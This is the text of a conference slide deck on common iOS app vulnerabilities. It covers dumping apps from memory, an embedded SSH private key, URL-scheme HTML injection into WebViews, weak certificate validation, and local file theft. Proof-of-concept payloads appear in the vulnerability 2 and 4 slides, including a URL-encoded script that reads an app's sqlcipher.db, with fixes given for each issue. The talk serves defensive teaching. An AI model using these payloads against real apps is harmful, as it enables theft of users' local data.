common vulnerabilities on ios apps
play

Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA - PowerPoint PPT Presentation

Oct 17, 2023 •347 likes •1.18k views

Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA @ivRodriguezCA DISCLAIMER the views and opinions expressed on this talk are solely my own and do not reflect the views or opinions of my employer. @ivRodriguezCA

  1. Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA

  2. @ivRodriguezCA

  3. DISCLAIMER the views and opinions expressed on this talk are solely my own and do not reflect the views or opinions of my employer. @ivRodriguezCA

  4. ivan_rodriguez.me • security researcher and software engineer • focused on iOS reverse engineering and mobile bug bounty programs • i blog at ivrodriguez.com • find me on twitter: @ivRodriguezCA • find me on github: /ivRodriguezCA @ivRodriguezCA

  5. agenda • reverse engineering an iOS app. • tools and methods. • common iOS vulnerabilities (all found on real world applications). • how to fix and prevent these vulnerabilities. • resources / conclusions. • questions. @ivRodriguezCA

  6. reverse engineering an iOS app • iOS apps are encrypted with an algorithm called FairPlay. • we need a jailbroken device. • we don’t “decrypt” the apps, we just dump them from memory. • transfer them to a desktop where we do the reverse engineering. @ivRodriguezCA

  7. reverse engineering an iOS app • how we dump the app from memory? > dump memory <filename> <start_address> <end_address> @ivRodriguezCA

  8. reverse engineering an iOS app • how we dump the app from memory? > dump memory <filename> <start_address> <end_address> • we can use tools to automate this. @ivRodriguezCA

  9. reverse engineering an iOS app • some of the tools we can use: - dumpdecrypted: https://github.com/stefanesser/dumpdecrypted - bfinject: https://github.com/BishopFox/bfinject - frida-ios-dump: https://github.com/AloneMonkey/frida-ios-dump @ivRodriguezCA

  10. reverse engineering an iOS app @ivRodriguezCA

  11. reverse engineering an iOS app @ivRodriguezCA

  12. reverse engineering an iOS app @ivRodriguezCA

  13. reverse engineering an iOS app • dynamic and static analysis @ivRodriguezCA

  14. reverse engineering an iOS app • dynamic and static analysis @ivRodriguezCA

  15. reverse engineering an iOS app • dynamic and static analysis @ivRodriguezCA

  16. vulnerability # 1 • searching through embedded files within the app @ivRodriguezCA

  17. vulnerability # 1 @ivRodriguezCA

  18. vulnerability # 1 private_key @ivRodriguezCA

  19. vulnerability # 1 private_key yes, PRIVATE key @ivRodriguezCA

  20. vulnerability # 1 cloud server @ivRodriguezCA

  21. vulnerability # 1 cloud server @ivRodriguezCA

  22. vulnerability # 1 cloud server @ivRodriguezCA

  23. vulnerability # 1 cloud server ssh @ivRodriguezCA

  24. vulnerability # 1 cloud server  ssh @ivRodriguezCA

  25. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA

  26. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA

  27. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA

  28. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA

  29. how to fix vulnerability # 1 cloud server own server public api @ivRodriguezCA

  30. how to fix vulnerability # 1 cloud server own server ssh @ivRodriguezCA

  31. how to fix vulnerability # 1 cloud server own server ssh @ivRodriguezCA

  32. vulnerability # 2 @ivRodriguezCA

  33. vulnerability # 2 @ivRodriguezCA

  34. vulnerability # 2 @ivRodriguezCA

  35. vulnerability # 2 @ivRodriguezCA

  36. vulnerability # 2 @ivRodriguezCA

  37. @ivRodriguezCA

  38. vulnerability # 2 • coinza://news/<trusted-html> @ivRodriguezCA

  39. vulnerability # 2 • coinza://news/<trusted-html> - <html><body><script>document.location = ‘https://en.wikipedia.org/ wiki/URL_redirection’;</script></body></html> • @ivRodriguezCA

  40. vulnerability # 2 • coinza://news/<trusted-html> - <html><body><script>document.location = ‘https://en.wikipedia.org/ wiki/URL_redirection’;</script></body></html> coinza://news/ %3Chtml%3E%3Cbody%3E%3Cscript%3Edocument.location%20%3D%20% 27https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FURL_redirection%27%3B% 3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E @ivRodriguezCA

  41. how to fix vulnerability # 2 @ivRodriguezCA

  42. how to fix vulnerability # 2  @ivRodriguezCA

  43. how to fix vulnerability # 2 • URL Schemes + WebViews are dangerous and you should be careful when you pair them. • don’t load HTML code from user-controlled content. • if you need to dynamically react to URL Schemes have a set of whitelisted actions. @ivRodriguezCA

  44. vulnerability # 3 @ivRodriguezCA

  45. vulnerability # 3 @ivRodriguezCA

  46. vulnerability # 3 @ivRodriguezCA

  47. vulnerability # 3 @ivRodriguezCA

  48. vulnerability # 3 @ivRodriguezCA

  49. vulnerability # 3 == ? @ivRodriguezCA

  50. vulnerability # 3 ✅ @ivRodriguezCA

  51. vulnerability # 3 🛒 @ivRodriguezCA

  52. vulnerability # 3 🚬 🛒 @ivRodriguezCA

  53. vulnerability # 3 ✅ 🛒 @ivRodriguezCA

  54. vulnerability # 3 website.com 🛒 @ivRodriguezCA

  55. vulnerability # 3 username/password 🛒 @ivRodriguezCA

  56. vulnerability # 3 🛒 @ivRodriguezCA

  57. @ivRodriguezCA

  58. vulnerability # 3 @ivRodriguezCA

  59. vulnerability # 3 detected connection to a website @ivRodriguezCA

  60. vulnerability # 3 creates fake TLS certificate @ivRodriguezCA

  61. vulnerability # 3 sniffs client traffic @ivRodriguezCA

  62. how to fix vulnerability # 3 • vet and test your 3rd party frameworks, specially if they handle your network requests. • be careful when implementing your own certificate validation logic. • if you want to implement HPKP you can use TrustKit: - https://github.com/datatheorem/TrustKit @ivRodriguezCA

  63. how to fix vulnerability # 3 source: https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html @ivRodriguezCA

  64. vulnerability # 4 @ivRodriguezCA

  65. vulnerability # 4 @ivRodriguezCA

  66. vulnerability # 4 @ivRodriguezCA

  67. vulnerability # 4 @ivRodriguezCA

  68. vulnerability # 4 @ivRodriguezCA

  69. vulnerability # 4 • these methods are equivalent for local files @ivRodriguezCA

  70. vulnerability # 4 @ivRodriguezCA

  71. vulnerability # 4 file: sqlcipher.db path: Documents/ @ivRodriguezCA

  72. vulnerability # 4 send file to a remote location. @ivRodriguezCA

  73. vulnerability # 4 • coinza://news/ %3Chtml%3E%0A%20%20%20%3Cbody%3E%0A%20%20%20%20%20%20%3Cscript%3E%0A%20%20%20%20%20%20%20%20%20function%20loa dFile%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20var%20xmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%0 A%20%20%20%20%20%20%20%20%20%20%20%20documentsPath%20%3D%20document.URL.split%28%27%2F%27%29.slice%280%2C%20-1%29.j oin%28%27%2F%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20filePath%20%3D%20documentsPath%20%2B%20%27%2F%27% 20%2B%20%27sqlcipher.db%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onreadystatechange%20%3D%20function%28%2 9%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.readyState%20%3D%3D%204%29%20%7B%0A%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.responseText.length%20%3E%200%29%20%7B%0A%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%27Got%20file%20%5C%27sqlcipher.db%5C%27%2C%20size %3A%20%27%20%2B%20xmlhttp.responseText.length%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7 D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%3B%0A%2 0%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onerror%20%3D%20function%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20alert%28%27Error%21%20%27%20%2B%20filePath%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A %20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.open%28%27GET%27%2C%20filePath%2C%20true%29%3B%0A%20%20%20%20%20%2 0%20%20%20%20%20%20xmlhttp.send%28%29%3B%0A%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20wind ow.onload%20%3D%20loadFile%3B%0A%20%20%20%20%20%20%3C%2Fscript%3E%0A%20%20%20%20%20%20%3Cp%3E%0A%20%20%20%20% 20%20%20%20%20Hello%20World%0A%20%20%20%20%20%20%3C%2Fp%3E%0A%20%20%20%3C%2Fbody%3E%0A%3C%2Fhtml%3E @ivRodriguezCA

  74. @ivRodriguezCA

  75. how to fix vulnerability # 4 • do not use UIWebView anymore, use WKWebView instead. • if you absolutely have to use UIWebView: - do not use - (void)loadRequest:(NSURLRequest *)request for local files. - Use - (void)loadHTMLString:(NSString *)string baseURL:(NSURL *)baseURL with an URL object created with [URLWithString:@“about:blank”] . - @ivRodriguezCA

  76. conclusions • add security assessments to your release cycles. • keep your 3rd party libraries up to date. • be careful copy-pasting code from online sources. • have a public bounty program or at least public channels for responsible disclosures. @ivRodriguezCA

  77. resources • OWASP - Mobile Application Security Verification Standard 
 https://github.com/OWASP/owasp-masvs • OWASP - The Mobile Security Testing Guide 
 https://github.com/OWASP/owasp-mstg • Resources Page of my course 
 https://github.com/ivRodriguezCA/RE-iOS-Apps/blob/master/ Resources.md @ivRodriguezCA

Recommend

vulnerabilities CVE, Common Vulnerabilities and Exposures CWE, Common Weakness Enumeration

vulnerabilities CVE, Common Vulnerabilities and Exposures CWE, Common Weakness Enumeration

Security &amp; Knowledge Management a.a. 2019/20 There are a set of sources that provide updated information about security vulnerabilities CVE, Common Vulnerabilities and Exposures CWE, Common Weakness Enumeration CAPEC,

197 views • 8 slides
Typical vulnerabilities in Lightning Apps Igor Korsakov /

Typical vulnerabilities in Lightning Apps Igor Korsakov /

Typical vulnerabilities in Lightning Apps Igor Korsakov / bluewallet.io / Berlin / October, 2019 Plan 1. Double spends with hold-invoices; anatomy of sendPayment 2. Stealing free fees 3. Race-condition attacks

701 views • 20 slides
Common software vulnerabilities: causes and consequences Ricardo J. Rodrguez CUD

Common software vulnerabilities: causes and consequences Ricardo J. Rodrguez CUD

Common software vulnerabilities: causes and consequences Ricardo J. Rodrguez CUD rjrodriguez@unizar.es @RicardoJRdez 14 de marzo, 2019 I Jornadas OWASP ZGZ $whoami Ph.D. in Computer Sciences (University of Zaragoza, 2013)

611 views • 31 slides
WISTP 07 A comparative analysis of common threats, vulnerabilities, attacks and

WISTP 07 A comparative analysis of common threats, vulnerabilities, attacks and

WISTP 07 A comparative analysis of common threats, vulnerabilities, attacks and countermeasures within smart card and wireless sensor network node technologies. Kevin Eagles, Konstantinos Markantonakis and Keith Mayes Smart Card Centre,

337 views • 22 slides
Small Business Apps WHAT ARE MOBI LE APPS ? W h a t are mob i le apps ? A little bit of

Small Business Apps WHAT ARE MOBI LE APPS ? W h a t are mob i le apps ? A little bit of

WELCOME Small Business Apps WHAT ARE MOBI LE APPS ? W h a t are mob i le apps ? A little bit of information An App is a piece of so ware (a program) that needs to be installed on Mobile Apps are device specific, meaning that an App that runs

268 views • 12 slides
S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in

S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in

S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in Android Apps David Sounthiraraj Justin Sahs Garret Greenwood Zhiqiang Lin Latifur Khan University of Texas at Dallas February 26, 2014

671 views • 40 slides
HEV-E Hazards, Exposures and Vulnerabilities Explorer Dr. Giovanni Allegri Ing. Simone

HEV-E Hazards, Exposures and Vulnerabilities Explorer Dr. Giovanni Allegri Ing. Simone

HEV-E Hazards, Exposures and Vulnerabilities Explorer Dr. Giovanni Allegri Ing. Simone Giannecchini About Us Around since 2006 Expertise GeoSpatial Data Fusion, Web Mashups, Mobile Apps OGC, ISO, INSPIRE Standards

565 views • 30 slides
Boxing them in Buggy apps can crash other apps The Kernel App 1 App 2 App 3 Buggy apps can

Boxing them in Buggy apps can crash other apps The Kernel App 1 App 2 App 3 Buggy apps can

Boxing them in Buggy apps can crash other apps The Kernel App 1 App 2 App 3 Buggy apps can crash OS wants to be your friend Buggy apps can hog all resources Operating System Malicious apps can violate Reading and writing memory, privacy

548 views • 17 slides
F ROM WEBSITES TO APPS , AND NOW FROM APPS TO CHATBOTS ? A NTNIO B RANCO FROM APPS TO CHATBOTS

F ROM WEBSITES TO APPS , AND NOW FROM APPS TO CHATBOTS ? A NTNIO B RANCO FROM APPS TO CHATBOTS

F ROM WEBSITES TO APPS , AND NOW FROM APPS TO CHATBOTS ? A NTNIO B RANCO FROM APPS TO CHATBOTS CEO of large social network in annual development conference 2 months ago Shared vision for next 2 decades: past : with advent of PCs, companies

498 views • 14 slides
Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android

Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android

Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android Applications Daniele Gallingani, Rigel Gjomemo , V.N. Venkatakrishnan, Stefano Zanero Android Message Passing Mechanism Android apps are composed of

566 views • 23 slides
The Kernel wants to be your friend Boxing them in Buggy apps can crash other apps App 1 App 2

The Kernel wants to be your friend Boxing them in Buggy apps can crash other apps App 1 App 2

The Kernel wants to be your friend Boxing them in Buggy apps can crash other apps App 1 App 2 App 3 Buggy apps can crash OS Buggy apps can hog all resources Operating System Malicious apps can violate Reading and writing memory, privacy

1.15k views • 67 slides
STROLLING INTO RING-0 via i/o kit drivers @patrickwardle WHOIS security for the 21st century

STROLLING INTO RING-0 via i/o kit drivers @patrickwardle WHOIS security for the 21st century

STROLLING INTO RING-0 via i/o kit drivers @patrickwardle WHOIS security for the 21st century leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, IoT

648 views • 47 slides
By: Taylor Thomas &amp; Ashley Fischer There are apps for just about EVERYTHING! There are

By: Taylor Thomas &amp; Ashley Fischer There are apps for just about EVERYTHING! There are

By: Taylor Thomas &amp; Ashley Fischer There are apps for just about EVERYTHING! There are new apps being developed and posted everyday. Some of the best apps you will ever find are FREE! There are two ways to download apps for

606 views • 38 slides
CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2 XSS-0 : client-side XSS-1 : reflective XSS-2 : persistent XSS Is Exceedingly Common 3 Web Hacking Incident Database (1999 -

887 views • 44 slides
NECESSARY BACKGROUND ON MEMORY EXPLOITS AND WEB APPLICATION VULNERABILITIES Outline 2

NECESSARY BACKGROUND ON MEMORY EXPLOITS AND WEB APPLICATION VULNERABILITIES Outline 2

1 NECESSARY BACKGROUND ON MEMORY EXPLOITS AND WEB APPLICATION VULNERABILITIES Outline 2 Memory safety attacks Buffer overruns Format string vulnerabilities Web application vulnerabilities SQL injections Cross-site

901 views • 39 slides
Mitigating and Preventing Vulnerabilities with ELFbac Ira Ray Jenkins, Dartmouth College Funded

Mitigating and Preventing Vulnerabilities with ELFbac Ira Ray Jenkins, Dartmouth College Funded

Mitigating and Preventing Vulnerabilities with ELFbac Ira Ray Jenkins, Dartmouth College Funded by the U.S. Department of Energy and the U.S. Department of Homeland Security | cred-c.org Code to Process Common object file formats source

394 views • 14 slides
Adaptive Progressive Web Apps PWA Progressive Web Apps are just great websites that can behave

Adaptive Progressive Web Apps PWA Progressive Web Apps are just great websites that can behave

Adaptive Progressive Web Apps PWA Progressive Web Apps are just great websites that can behave like native apps Progressive Web Apps are just great apps, powered by Web technologies and delivered with Web infrastructure.

454 views • 32 slides
Operating System Hardening Vulnerabilities Unique vulnerabilities for: Different

Operating System Hardening Vulnerabilities Unique vulnerabilities for: Different

Operating System Hardening Vulnerabilities Unique vulnerabilities for: Different operating systems Different vendors Client and server systems Vendors try to correct Attackers try to exploit Security professionals must

620 views • 11 slides
2015-16 Results: Thank You! Goal = 415,000 apps Actual = 427,695 apps $30,000 in

2015-16 Results: Thank You! Goal = 415,000 apps Actual = 427,695 apps $30,000 in

More Than a Meal Campaign 2016-17 Two applications, one deadline, many student resources 2015-16 Results: Thank You! Goal = 415,000 apps Actual = 427,695 apps $30,000 in recognition awards $60M/3 yrs in new revenue to the

345 views • 10 slides
All About Apps Well cover... Whats an app? What are app permissions? What do

All About Apps Well cover... Whats an app? What are app permissions? What do

All About Apps Well cover... Whats an app? What are app permissions? What do companies gain by getting your permission? Typical permissions requested by apps How to check up on apps already on your phone App safety

134 views • 11 slides
in Android apps Shin Hwei Zhen Xiang Abhik Tan Dong Gao Roychoudhury 2 Prevalence of

in Android apps Shin Hwei Zhen Xiang Abhik Tan Dong Gao Roychoudhury 2 Prevalence of

Repairing crashes in Android apps Shin Hwei Zhen Xiang Abhik Tan Dong Gao Roychoudhury 2 Prevalence of Mobile Apps App Store Google Play Launched with 500 apps. 3.5 millions apps By July 17, 10 millions available for download apps

518 views • 22 slides
Jonathan Pollet conference Part 1: Control System Vulnerabilities control system vulnerabilities

Jonathan Pollet conference Part 1: Control System Vulnerabilities control system vulnerabilities

Rome, May 31, 2011 Jonathan Pollet conference Part 1: Control System Vulnerabilities control system vulnerabilities &gt; analysis of 5 years of field data Jonathan Pollet, CISSP , CAP , PCIP Red Tiger Security [on behalf of the DHS CSSP

413 views • 20 slides
On the Road: Websites and Apps for Travel Loading the Right Apps Lets you get the most out

On the Road: Websites and Apps for Travel Loading the Right Apps Lets you get the most out

On the Road: Websites and Apps for Travel Loading the Right Apps Lets you get the most out of your vacation Helps you avoid missing important sites Eliminates confusion while travelling Keeps you connected to home Tips for

971 views • 39 slides
Mobile Apps INFM 603 Week 10 Agenda Questions Mobile Apps HCI Project

Mobile Apps INFM 603 Week 10 Agenda Questions Mobile Apps HCI Project

Mobile Apps INFM 603 Week 10 Agenda Questions Mobile Apps HCI Project discussions Native Apps Live on device Access to all device features GPS, accelerometer, compass, list of contacts Written for specific

654 views • 38 slides

More recommend